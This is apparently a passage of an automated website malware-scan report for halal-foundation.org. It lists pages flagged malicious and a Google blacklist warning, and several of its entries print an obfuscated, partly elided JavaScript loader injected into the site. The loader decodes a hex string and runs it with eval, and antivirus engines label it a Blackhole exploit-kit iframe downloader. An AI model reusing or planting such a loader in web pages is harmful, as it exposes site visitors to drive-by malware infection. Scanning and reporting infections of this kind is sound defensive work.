New scan:

Malware Scanner report for halal-foundation.org

Malicious/Suspicious/Total urls checked
15/0/16
15 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "halal-foundation.org" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=halal-foundation.org

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://halal-foundation.org/
HTTP/1.1 302 Object moved
Cache-Control: private
Connection: close
Date: Wed, 01 Oct 2014 23:23:27 GMT
Location: http://www.halal-foundation.com/
Server: Microsoft-IIS/6.0
Content-Length: 153
Content-Type: text/html
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Server: ash08
clean
http://www.halal-foundation.com/
200 OK
Content-Length: 12323
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

cup=String;sjqfnu="spl"+"i"+"t";akml=window;lmrzvl=(1)?"0x":"123";kudlu=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(qftp){pvdsa=false;try{}catch(ksbs){pvdsa=21;}
if(1){kgr="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq61Zq5cZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq61Z
... 3004 bytes are skipped ...
Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq61Zq5cZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[sjqfnu]("Zq");}akml=kgr;lvhdp=[];for(lbqmu=22-20-2;-lbqmu+1381!=0;lbqmu+=1){gada=lbqmu;if((0x19==031))lvhdp+=cup.fromCharCode(eval(lmrzvl+akml[1*gada])+0xa-kudlu);}avuv=eval;z=123;if(Math.ceil(5.5)===6)avuv(lvhdp)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Exploit.BlackHole.OA
K7AntiVirus
Trojan
TrendMicro-HouseCall
TROJ_GEN.F47V1025
Emsisoft
JS:Exploit.BlackHole.OA (B)
Comodo
TrojWare.JS.Kryptik.xt
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Kaspersky
Exploit.JS.Agent.bnu
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.OA
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.OA
Commtouch
JS/IFrame.RS

http://www.halal-foundation.com/./index.htm
200 OK
Content-Length: 12323
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

cup=String;sjqfnu="spl"+"i"+"t";akml=window;lmrzvl=(1)?"0x":"123";kudlu=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(qftp){pvdsa=false;try{}catch(ksbs){pvdsa=21;}
if(1){kgr="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq61Zq5cZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq61Z
... 3004 bytes are skipped ...
Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq61Zq5cZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[sjqfnu]("Zq");}akml=kgr;lvhdp=[];for(lbqmu=22-20-2;-lbqmu+1381!=0;lbqmu+=1){gada=lbqmu;if((0x19==031))lvhdp+=cup.fromCharCode(eval(lmrzvl+akml[1*gada])+0xa-kudlu);}avuv=eval;z=123;if(Math.ceil(5.5)===6)avuv(lvhdp)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Exploit.BlackHole.OA
K7AntiVirus
Trojan
TrendMicro-HouseCall
TROJ_GEN.F47V1025
Emsisoft
JS:Exploit.BlackHole.OA (B)
Comodo
TrojWare.JS.Kryptik.xt
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Kaspersky
Exploit.JS.Agent.bnu
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.OA
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.OA
Commtouch
JS/IFrame.RS

http://www.halal-foundation.com/././index.htm
200 OK
Content-Length: 12323
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

cup=String;sjqfnu="spl"+"i"+"t";akml=window;lmrzvl=(1)?"0x":"123";kudlu=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(qftp){pvdsa=false;try{}catch(ksbs){pvdsa=21;}
if(1){kgr="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq61Zq5cZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq61Z
... 3004 bytes are skipped ...
Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq61Zq5cZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[sjqfnu]("Zq");}akml=kgr;lvhdp=[];for(lbqmu=22-20-2;-lbqmu+1381!=0;lbqmu+=1){gada=lbqmu;if((0x19==031))lvhdp+=cup.fromCharCode(eval(lmrzvl+akml[1*gada])+0xa-kudlu);}avuv=eval;z=123;if(Math.ceil(5.5)===6)avuv(lvhdp)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Exploit.BlackHole.OA
K7AntiVirus
Trojan
TrendMicro-HouseCall
TROJ_GEN.F47V1025
Emsisoft
JS:Exploit.BlackHole.OA (B)
Comodo
TrojWare.JS.Kryptik.xt
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Kaspersky
Exploit.JS.Agent.bnu
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.OA
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.OA
Commtouch
JS/IFrame.RS

http://www.halal-foundation.com/./././index.htm
200 OK
Content-Length: 12323
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

cup=String;sjqfnu="spl"+"i"+"t";akml=window;lmrzvl=(1)?"0x":"123";kudlu=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(qftp){pvdsa=false;try{}catch(ksbs){pvdsa=21;}
if(1){kgr="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq61Zq5cZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq61Z
... 3004 bytes are skipped ...
Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq61Zq5cZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[sjqfnu]("Zq");}akml=kgr;lvhdp=[];for(lbqmu=22-20-2;-lbqmu+1381!=0;lbqmu+=1){gada=lbqmu;if((0x19==031))lvhdp+=cup.fromCharCode(eval(lmrzvl+akml[1*gada])+0xa-kudlu);}avuv=eval;z=123;if(Math.ceil(5.5)===6)avuv(lvhdp)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Exploit.BlackHole.OA
K7AntiVirus
Trojan
TrendMicro-HouseCall
TROJ_GEN.F47V1025
Emsisoft
JS:Exploit.BlackHole.OA (B)
Comodo
TrojWare.JS.Kryptik.xt
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Kaspersky
Exploit.JS.Agent.bnu
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.OA
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.OA
Commtouch
JS/IFrame.RS

http://www.halal-foundation.com/././././index.htm
200 OK
Content-Length: 12323
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

cup=String;sjqfnu="spl"+"i"+"t";akml=window;lmrzvl=(1)?"0x":"123";kudlu=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(qftp){pvdsa=false;try{}catch(ksbs){pvdsa=21;}
if(1){kgr="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq61Zq5cZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq61Z
... 3004 bytes are skipped ...
Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq61Zq5cZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[sjqfnu]("Zq");}akml=kgr;lvhdp=[];for(lbqmu=22-20-2;-lbqmu+1381!=0;lbqmu+=1){gada=lbqmu;if((0x19==031))lvhdp+=cup.fromCharCode(eval(lmrzvl+akml[1*gada])+0xa-kudlu);}avuv=eval;z=123;if(Math.ceil(5.5)===6)avuv(lvhdp)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Exploit.BlackHole.OA
K7AntiVirus
Trojan
TrendMicro-HouseCall
TROJ_GEN.F47V1025
Emsisoft
JS:Exploit.BlackHole.OA (B)
Comodo
TrojWare.JS.Kryptik.xt
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Kaspersky
Exploit.JS.Agent.bnu
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.OA
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.OA
Commtouch
JS/IFrame.RS

http://www.halal-foundation.com/./././././index.htm
200 OK
Content-Length: 12323
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

cup=String;sjqfnu="spl"+"i"+"t";akml=window;lmrzvl=(1)?"0x":"123";kudlu=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(qftp){pvdsa=false;try{}catch(ksbs){pvdsa=21;}
if(1){kgr="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq61Zq5cZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq61Z
... 3004 bytes are skipped ...
Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq61Zq5cZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[sjqfnu]("Zq");}akml=kgr;lvhdp=[];for(lbqmu=22-20-2;-lbqmu+1381!=0;lbqmu+=1){gada=lbqmu;if((0x19==031))lvhdp+=cup.fromCharCode(eval(lmrzvl+akml[1*gada])+0xa-kudlu);}avuv=eval;z=123;if(Math.ceil(5.5)===6)avuv(lvhdp)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Exploit.BlackHole.OA
K7AntiVirus
Trojan
TrendMicro-HouseCall
TROJ_GEN.F47V1025
Emsisoft
JS:Exploit.BlackHole.OA (B)
Comodo
TrojWare.JS.Kryptik.xt
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Kaspersky
Exploit.JS.Agent.bnu
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.OA
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.OA
Commtouch
JS/IFrame.RS

http://www.halal-foundation.com/././././././index.htm
200 OK
Content-Length: 12323
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

cup=String;sjqfnu="spl"+"i"+"t";akml=window;lmrzvl=(1)?"0x":"123";kudlu=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(qftp){pvdsa=false;try{}catch(ksbs){pvdsa=21;}
if(1){kgr="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq61Zq5cZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq61Z
... 3004 bytes are skipped ...
Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq61Zq5cZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[sjqfnu]("Zq");}akml=kgr;lvhdp=[];for(lbqmu=22-20-2;-lbqmu+1381!=0;lbqmu+=1){gada=lbqmu;if((0x19==031))lvhdp+=cup.fromCharCode(eval(lmrzvl+akml[1*gada])+0xa-kudlu);}avuv=eval;z=123;if(Math.ceil(5.5)===6)avuv(lvhdp)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Exploit.BlackHole.OA
K7AntiVirus
Trojan
TrendMicro-HouseCall
TROJ_GEN.F47V1025
Emsisoft
JS:Exploit.BlackHole.OA (B)
Comodo
TrojWare.JS.Kryptik.xt
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Kaspersky
Exploit.JS.Agent.bnu
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.OA
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.OA
Commtouch
JS/IFrame.RS

http://www.halal-foundation.com/./././././././index.htm
200 OK
Content-Length: 12323
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

cup=String;sjqfnu="spl"+"i"+"t";akml=window;lmrzvl=(1)?"0x":"123";kudlu=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(qftp){pvdsa=false;try{}catch(ksbs){pvdsa=21;}
if(1){kgr="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq61Zq5cZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq61Z
... 3004 bytes are skipped ...
Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq61Zq5cZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[sjqfnu]("Zq");}akml=kgr;lvhdp=[];for(lbqmu=22-20-2;-lbqmu+1381!=0;lbqmu+=1){gada=lbqmu;if((0x19==031))lvhdp+=cup.fromCharCode(eval(lmrzvl+akml[1*gada])+0xa-kudlu);}avuv=eval;z=123;if(Math.ceil(5.5)===6)avuv(lvhdp)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Exploit.BlackHole.OA
K7AntiVirus
Trojan
TrendMicro-HouseCall
TROJ_GEN.F47V1025
Emsisoft
JS:Exploit.BlackHole.OA (B)
Comodo
TrojWare.JS.Kryptik.xt
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Kaspersky
Exploit.JS.Agent.bnu
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.OA
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.OA
Commtouch
JS/IFrame.RS

http://www.halal-foundation.com/././././././././index.htm
200 OK
Content-Length: 12323
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

cup=String;sjqfnu="spl"+"i"+"t";akml=window;lmrzvl=(1)?"0x":"123";kudlu=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(qftp){pvdsa=false;try{}catch(ksbs){pvdsa=21;}
if(1){kgr="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq61Zq5cZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq61Z
... 3004 bytes are skipped ...
Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq61Zq5cZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[sjqfnu]("Zq");}akml=kgr;lvhdp=[];for(lbqmu=22-20-2;-lbqmu+1381!=0;lbqmu+=1){gada=lbqmu;if((0x19==031))lvhdp+=cup.fromCharCode(eval(lmrzvl+akml[1*gada])+0xa-kudlu);}avuv=eval;z=123;if(Math.ceil(5.5)===6)avuv(lvhdp)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Exploit.BlackHole.OA
K7AntiVirus
Trojan
TrendMicro-HouseCall
TROJ_GEN.F47V1025
Emsisoft
JS:Exploit.BlackHole.OA (B)
Comodo
TrojWare.JS.Kryptik.xt
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Kaspersky
Exploit.JS.Agent.bnu
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.OA
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.OA
Commtouch
JS/IFrame.RS

http://www.halal-foundation.com/./././././././././index.htm
200 OK
Content-Length: 12323
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

cup=String;sjqfnu="spl"+"i"+"t";akml=window;lmrzvl=(1)?"0x":"123";kudlu=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(qftp){pvdsa=false;try{}catch(ksbs){pvdsa=21;}
if(1){kgr="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq61Zq5cZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq61Z
... 3004 bytes are skipped ...
Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq61Zq5cZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[sjqfnu]("Zq");}akml=kgr;lvhdp=[];for(lbqmu=22-20-2;-lbqmu+1381!=0;lbqmu+=1){gada=lbqmu;if((0x19==031))lvhdp+=cup.fromCharCode(eval(lmrzvl+akml[1*gada])+0xa-kudlu);}avuv=eval;z=123;if(Math.ceil(5.5)===6)avuv(lvhdp)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Exploit.BlackHole.OA
K7AntiVirus
Trojan
TrendMicro-HouseCall
TROJ_GEN.F47V1025
Emsisoft
JS:Exploit.BlackHole.OA (B)
Comodo
TrojWare.JS.Kryptik.xt
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Kaspersky
